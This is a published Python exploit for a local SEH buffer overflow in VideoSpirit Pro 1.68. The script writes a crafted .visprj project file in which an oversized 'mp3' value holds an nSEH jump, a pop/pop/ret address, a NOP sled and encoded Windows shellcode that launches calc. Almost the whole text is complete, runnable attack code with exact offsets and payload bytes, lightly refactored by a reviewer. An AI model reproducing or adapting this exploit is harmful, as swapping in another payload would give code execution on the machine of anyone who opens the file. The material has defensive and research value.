
VideoSpirit Pro 1.68 Buffer Overflow

Posted on 08 January 2011

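#!/usr/bin/python
# Exploit Title: VideoSpirit Pro v1.68 Local BoF Exploit
# Date: 01/08/2011
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsec[at]x-sploited.com
# Software Link: http://www.verytools.com/videospirit/download.html
# Vulnerable version: v1.68
# Tested on: Windows XP SP3 Eng
#
# Software description
#
# "VideoSpirit Pro is the most easily used Video Converter/Editor tools. For acting as a Video Editor,
# various slide effect/title/subtitle can be added to a video clip. Also, the video clip can be rotated,
# resized and warped. Multiple video/audio clips can be joined together. Converting speed is fast and
# the quality of output file is excellent."
#
# Vulnerability info
#
# VideoSpirit Pro is prone to a buffer overflow when parsing a (.visprj) project file that
# contains an overly long "mp3" value. This is because the application fails to properly bounds
# check the data before it is passed to strcpy().
#
# NOTE(review): the archived copy of this PoC had lost the backslash from every "\xNN" escape
# (it read "x6ax32..."), so none of its string literals held the intended bytes.  The escapes are
# restored here and the hex-escaped project-file skeleton is spelled out as readable text; the
# output is now written in binary mode (text mode on Windows would rewrite the CRLFs) and the
# script only acts when run directly, so it can be imported and unit-tested.
"""Build a VideoSpirit Pro v1.68 project file (.visprj) with an oversized "mp3" value.

Layout of the 5000-byte value: 104 bytes of filler up to the SEH record, a short jump
in the nSEH slot, a pop/pop/ret address in the handler slot, a small NOP sled, the
encoded payload and junk padding.  Runs under Python 2.6+ and Python 3.

Usage: python <this script> <outfile.visprj>
"""
import os
import struct
import sys

BANNER = (
    "\n ==============================================\n"
    " VideoSpirit Pro v1.68 Local BoF PoC\n"
    " Author: xsploitedsec\n"
    " URL: http://www.x-sploited.com/\n"
    " ==============================================\n"
)

DEFAULT_OUTFILE = "xsploited.visprj"

# Offset of the nSEH slot from the start of the "mp3" value, as found by the author.
NSEH_OFFSET = 104
# nSEH: "jmp short +6" skips the two pad NOPs and the 4-byte handler, landing on the sled.
NSEH_JUMP = b"\xEB\x06\x90\x90"
# pop/pop/ret in overlayplug.dll, which lives in the application directory.
# NOTE(review): 0x0B occurs twice in this address while "\x0b" is in the msfencode
# bad-char list below; presumably that list was conservative for the shellcode only -- confirm.
SEH_HANDLER = 0x100B0B94
NOP_SLED_LEN = 24
# Total size of the "mp3" value; anything after the shellcode is junk padding.
PAYLOAD_LEN = 5000

# msfpayload windows/exec CMD=calc EXITFUNC=seh R | msfencode -e x86/fnstenv_mov
#   -c 1 -b '\x00\x22\x0a\x0b\x1c\x0c\x2f\x21' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 222 (iteration=1)
SHELLCODE = (
    b"\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf"
    b"\xf8\x92\x62\x83\xeb\xfc\xe2\xf4\x43\x10\x1b\x62\xbf\xf8"
    b"\xf2\xeb\x5a\xc9\x40\x06\x34\xaa\xa2\xe9\xed\xf4\x19\x30"
    b"\xab\x73\xe0\x4a\xb0\x4f\xd8\x44\x8e\x07\xa3\xa2\x13\xc4"
    b"\xf3\x1e\xbd\xd4\xb2\xa3\x70\xf5\x93\xa5\x5d\x08\xc0\x35"
    b"\x34\xaa\x82\xe9\xfd\xc4\x93\xb2\x34\xb8\xea\xe7\x7f\x8c"
    b"\xd8\x63\x6f\xa8\x19\x2a\xa7\x73\xca\x42\xbe\x2b\x71\x5e"
    b"\xf6\x73\xa6\xe9\xbe\x2e\xa3\x9d\x8e\x38\x3e\xa3\x70\xf5"
    b"\x93\xa5\x87\x18\xe7\x96\xbc\x85\x6a\x59\xc2\xdc\xe7\x80"
    b"\xe7\x73\xca\x46\xbe\x2b\xf4\xe9\xb3\xb3\x19\x3a\xa3\xf9"
    b"\x41\xe9\xbb\x73\x93\xb2\x36\xbc\xb6\x46\xe4\xa3\xf3\x3b"
    b"\xe5\xa9\x6d\x82\xe7\xa7\xc8\xe9\xad\x13\x14\x3f\xd5\xf9"
    b"\x1f\xe7\x06\xf8\x92\x62\xef\x90\xa3\xe9\xd0\x7f\x6d\xb7"
    b"\x04\x06\x9c\x50\x55\x90\x34\xf7\x02\x65\x6d\xb7\x83\xfe"
    b"\xee\x68\x3f\x03\x72\x17\xba\x43\xd5\x71\xcd\x97\xf8\x62"
    b"\xec\x07\x47\x01\xde\x94\xf1\x62\xb5\xf8\x92\x62"
)

# Hex-encoded item record copied verbatim from the original PoC.  It begins with the hex of
# "C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg"
# (the stock XP sample picture) plus a NUL; the remaining fields are opaque and left as-is.
ITEM_RECORD_HEX = (
    b"0100000059000000"
    b"433A5C446F63756D656E747320616E642053657474696E67735C"  # C:\Documents and Settings\
    b"416C6C2055736572735C"                                  # All Users\
    b"446F63756D656E74735C"                                  # Documents\
    b"4D792050696374757265735C"                              # My Pictures\
    b"53616D706C652050696374757265735C"                      # Sample Pictures\
    b"426C75652068696C6C732E6A706700"                        # Blue hills.jpg\0
    b"000000001E000000030000002000000000000000"
    b"000048420000484200008743000048420000874300003E43"
    b"0000484200003E4340010000F0000000FF000000FFFFFFFF"
    b"02000000C8C8C8FF000000000000000000000000"
    b"030000006E6F00EEEEEEEE0000000000"
)

# Project-file skeleton around the overflowed value.  Line endings are CRLF as in the
# original blob; the overlong value goes between HEADER and FOOTER.
HEADER = b"".join([
    b'<version value="1" />\r\n',
    b'<track>\r\n',
    b'    <type value="0" />\r\n',
    b'    <type value="4" />\r\n',
    b'    <type value="2" />\r\n',
    b'    <type value="1" />\r\n',
    b'    <type value="7" />\r\n',
    b'</track>\r\n',
    b'<track0 />\r\n',
    b'<track1>\r\n',
    b'    <item name="Blue hills.jpg" set="3" value="' + ITEM_RECORD_HEX + b'" />\r\n',
    b'</track1>\r\n',
    b'<track2 />\r\n',
    b'<track3 />\r\n',
    b'<track4 />\r\n',
    b'<clip />\r\n',
    b'<output typename="AVI" keepaspect="0" presetquality="0">\r\n',
    b'    <type0 enable="1">\r\n',
    b'        <valitem name="msmpeg4v2" value="msmpeg4v2" />\r\n',
    b'        <valitem name="320*240(4:3)" value="320*240" />\r\n',
    b'        <valitem name="30" value="30" />\r\n',
    b'        <valitem name="16000k" value="16000k" />\r\n',
    b'    </type0>\r\n',
    b'    <type1 enable="1">\r\n',
    b'        <valitem name="mp3" value="',
])

FOOTER = (
    b'" />\r\n'
    b'        <valitem name="128k" value="128k" />\r\n'
    b'        <valitem name="44100" value="44100" />\r\n'
    b'        <valitem name="2 (Stereo)" value="2" />\r\n'
    b'    </type1>\r\n'
    b'    <type2 enable="0" />\r\n'
    b'</output>\r\n'
)


def build_payload(shellcode=SHELLCODE, handler=SEH_HANDLER, total_len=PAYLOAD_LEN):
    """Return the oversized "mp3" value: filler, nSEH jump, handler, NOP sled, shellcode, junk.

    Args:
        shellcode: bytes placed after the NOP sled (default: the encoded calc payload).
        handler: address written into the SEH handler slot, packed little-endian.
        total_len: total length of the returned value; the tail is filled with 0x42.

    Raises:
        ValueError: if the fixed parts plus ``shellcode`` do not fit in ``total_len``
            (the original silently emitted an oversized value in that case).
    """
    body = b"".join([
        b"\x41" * NSEH_OFFSET,
        NSEH_JUMP,
        struct.pack("<L", handler),
        b"\x90" * NOP_SLED_LEN,  # small NOP sled, the jump above lands here
        shellcode,
    ])
    if len(body) > total_len:
        raise ValueError("payload is %d bytes over the %d-byte limit" % (len(body) - total_len, total_len))
    return body + b"\x42" * (total_len - len(body))


def build_project_file(payload=None):
    """Return the complete .visprj contents wrapping ``payload`` (default: build_payload())."""
    if payload is None:
        payload = build_payload()
    return HEADER + payload + FOOTER


def write_project_file(outfile, data):
    """Write ``data`` to ``outfile`` in binary mode; return True on success, False on IOError."""
    try:
        # Binary mode: the data holds CRLFs and raw shellcode that text mode could rewrite.
        with open(outfile, "wb") as fh:
            fh.write(data)
    except IOError:
        return False
    return True


def main(argv=None):
    """Command-line entry point; returns 0 on success, 1 if the file could not be written."""
    argv = sys.argv if argv is None else argv
    print(BANNER)
    if len(argv) < 2:
        print("\n [!] Error No filename specified\n Usage: "
              + os.path.basename(argv[0]) + " <outfile.visprj>\n")
        outfile = DEFAULT_OUTFILE
        print("[!] Defaulting to " + DEFAULT_OUTFILE)
    else:
        outfile = argv[1]
    print("[*] Creating malicious project file")
    if write_project_file(outfile, build_project_file()):
        print("[+] File created successfully (" + outfile + ")\n[-] Exiting...")
        return 0
    print("[!] Error: unable to create file\n[-] Exiting...")
    return 1


if __name__ == "__main__":
    sys.exit(main())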

 
